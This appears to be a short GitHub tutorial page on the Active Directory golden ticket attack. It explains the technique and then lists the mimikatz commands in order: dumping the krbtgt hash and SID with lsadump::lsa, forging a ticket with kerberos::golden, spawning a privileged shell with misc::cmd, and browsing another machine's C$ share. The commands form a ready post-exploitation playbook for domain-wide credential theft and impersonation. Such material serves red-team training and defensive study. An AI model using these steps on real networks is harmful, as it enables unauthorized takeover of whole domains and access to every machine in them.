Golden-Ticket-Attack

Active Directory Post Exploitation

View on GitHub

Golden-Ticket-Attack

A golden ticket attack works by dumping the ticket-granting ticket of any user on the domain this would preferably be a domain admin however for a golden ticket you would dump the krbtgt ticket and for a silver ticket, you would dump any service or domain admin ticket. This will provide you with the service/domain admin account’s SID or security identifier that is a unique identifier for each user account, as well as the NTLM hash. You then use these details inside of a mimikatz golden ticket attack in order to create a TGT that impersonates the given service account information.

Golden Ticket Attacks w/ mimikatz

Using mimikatz.exe, we gonna dump the krbtgt hash and sid.

.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt

OnPaste 20220614-120938

Now generate golden ticket using krbtgt hash and sid.

kerberos::golden /user: /domain: /sid: /krbtgt: /id:

NOTE: id is set to 500 for golden ticket attack.

OnPaste 20220614-121203

Use the Golden Ticket to access other machine.

This will open a new command prompt with elevated privileges to all machines.

misc::cmd

OnPaste 20220614-121351

Access other Machines! - You will now have another command prompt with access to all other machines on the network.

dir \\DESKTOP-1\c$

OnPaste 20220614-121503

OnPaste 20220614-122214